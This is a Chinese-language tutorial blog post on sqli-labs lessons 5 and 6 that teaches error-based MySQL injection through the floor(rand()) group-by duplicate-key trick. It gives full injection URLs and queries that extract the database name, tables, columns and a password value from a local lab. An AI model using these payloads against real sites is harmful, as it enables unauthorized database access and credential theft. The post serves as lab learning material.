sql注入之lesson5&6
来源:互联网 发布:淘宝有卖楼凤资源的吗 编辑:程序博客网 时间:2024/06/08 06:12
lesson 5&6(本章的重点在于如何构造使其产生错误,从而得到我们需要的信息)
id=1’ 报错 r ’ ’ 1’ ’ LIMIT 0,1 ’ at line 1
猜测 select usename,password from table where id='input'
id=1’ and 1=1 –+ 返回正常 id=1’ and 1=2 –+ 错误
判断字段 order by 3正确 order by 4 错误 3个字段
二.基于错误的sql语句构造
**几个重要的函数
——count():统计元组的个数
+----------+| count(*) |+----------+| 285 |+----------+从information_schema.tables统计元组个数有多少——rand(): 用于产生一个0~1的随机数mysql> select rand();+--------------------+| rand() |+--------------------+| 0.9833602495336535 |+--------------------+1 row in set (0.00 sec)——floor(): 向下取整mysql> select floor(rand());+---------------+| floor(rand()) |+---------------+| 0 |+---------------+1 row in set (0.00 sec)mysql> select floor(rand()*2);+-----------------+| floor(rand()*2) |+-----------------+| 1 |+-----------------+1 row in set (0.00 sec)——group by:一句我们想要的规则对结果进行分组mysql> select table_name,table_schema from information_schema.tables group by table_schema;+----------------+--------------------+| table_name | table_schema |+----------------+--------------------+| ia3nznrjd4 | challenges || CHARACTER_SETS | information_schema || columns_priv | mysql || accounts | performance_schema || emails | security || host_summary | sys |+------------------------+-------------------------+6 rows in set (0.01 sec)
在information_schema中选择table_name与table_schema,并且按照table_schema
进行排序,在table_name中显示table_chema中的第一个表
进入mysql命令行use security;select database();select group_concat(0x3a,0x3a,database(),0x3a)name;(0x3a 是分号的,表头太长取一个别名name)+-------------+| name |+-------------+| ::security: |+-------------+接下来我们向里面添加刚才的随机数函数select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name;+--------------+| name |+--------------+| ::security:1 |+--------------+我们再增加一点内容select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables;informaition.tables 有多少条记录security显示多少次 随机数就执行多少次。为了让显示更有序 我们换成排列 concatselect concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables;对结果分组 以那么分组select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables group by name;加一个count统计select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name;多刷新几次 发现报错了,报错的信息有数据库的名字 那么我们可以的到更多信息ERROR 1062 (23000): Duplicate entry '::security:0' for key '<group_key>'我们将database换成versionselect count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;ERROR 1062 (23000): Duplicate entry '::5.7.19:1' for key '<group_key>'为了得到想要查询的东西比如说添加一个复杂的查询语句select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;将version()换为(select table_name from information_schema.tables where table_schema=database() limit 0,1)报错得到信息 继续查看其他信息 修改limit参数
回到sql注入 继续使用
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name) --+ 报错:Operand should contain 1 column(s) 操作应包含一列 { kc表是一个数据表,假设表的行数为10行。 select 1 from kc 增加临时列,每行的列值是写在select后的数,这条sql语句中是1 } 我们增加一列 http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)) --+ 报错: Every derived table must have its own alias 每个派生表必须有自己的别名 修改如下?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+ 报错得到数据库名 Duplicate entry ::security:0 for key' 按照之前的想法我们把database() 换成更复杂的语句 (select table_name from information_schema.tables where table_schema=database() limit 0,1) Duplicate entry '::emails:0' for key '' 得到表名email 修改limit得到第二个表 Duplicate entry '::users:1' for key ''为了得到user表里面的列名 修改一下(select column_name from information_schema.columns where table_name='users' limit 0,1)Duplicate entry '::USER:0' for key ''得到了其中的user列名 修改得到其他列名 得到password列名获取字段内容 (select password from users limit 0,1) 得到 Duplicate entry '::Dumb:1' for key ''
介绍完了 基于错误的 sql注入 lesson6 改为双引号就可以了
这里为什么会报错 是mysql的一个bug http://bugs.mysql.com/bug.php?id=32249
阅读全文
0 0
- sql注入之lesson5&6
- lesson5
- 注入攻击之sql注入
- SQL注入之联合注入
- SQL注入之堆叠注入
- SQL注入之cookie注入
- SQL注入之cookie注入
- SQL注入之报错型注入
- Quartz学习之Lesson5-SimpleTrigger
- 【SQL注入之sqli-labs】Less 6
- SQL 注入之ACCESS
- ibatis之sql注入
- SQL注入之我见
- SQL注入之注释
- PHP之SQL注入
- SQL注入之绕过
- 关于sql注入之cookie注入
- 关于sql注入之cookie注入
- WebApplicationStressToolWAS,Web应用负载测试工具详细说明
- CM5.12.0 spark 2.2.0 安装history service
- BeanUtils.populate 用法
- MySQL子查询与连接
- 目前的计算机还没有实现真正的智能
- sql注入之lesson5&6
- 软件天地,分享给有需要的人。。。
- Java Process中waitFor()的问题
- Error: Unable to access jarfile ApacheJMeter.jar
- springboot搭建和开发(下)
- String练习1
- Android 杀不死的进程(下)
- Spark 之 性能调优 写的不错
- mysql知识点